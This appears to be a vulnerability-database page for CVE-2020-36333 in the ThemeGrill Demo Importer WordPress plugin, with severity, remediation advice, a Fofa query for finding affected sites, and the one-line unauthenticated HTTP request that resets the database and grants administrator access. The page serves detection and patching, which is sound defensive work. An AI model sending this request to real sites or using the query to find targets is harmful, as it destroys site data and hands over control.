🔙 목록으로 돌아가기

CVE-2020-36333: ThemeGrill Demo Importer < 1.6.2 - Database Reset

TitleThemeGrill Demo Importer < 1.6.2 - Database Reset
Authoriamnoooob,pdresearch
SeverityCritical
ImpactUnauthenticated attackers can wipe the entire WordPress database to its default state and gain automatic administrator access, resulting in complete site takeover and data loss.
RemediationUpgrade to ThemeGrill Demo Importer version 1.6.2 or later.
CVSS Score9.1
EPSS Score0.50218
CVE IDCVE-2020-36333
CWE IDCWE-285
Fofa Querybody="/plugins/themegrill-demo-importer"
Tags cve cve2020 wp wordpress wp-plugin themegrill vkev vuln

🔍 Vulnerability Description

ThemeGrill Demo Importer before 1.6.2 does not require authentication for wiping the database due to a reset_wizard_actions hook. In versions 1.3.4 and above and versions 1.6.1 and below, there is a vulnerability that allows any unauthenticated user to wipe the entire database to its default state after which they are automatically logged in as an administrator.

🌐 HTTP Request

GET /wp-admin/admin-post.php?do_reset_wordpress=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-36333.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-36333.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A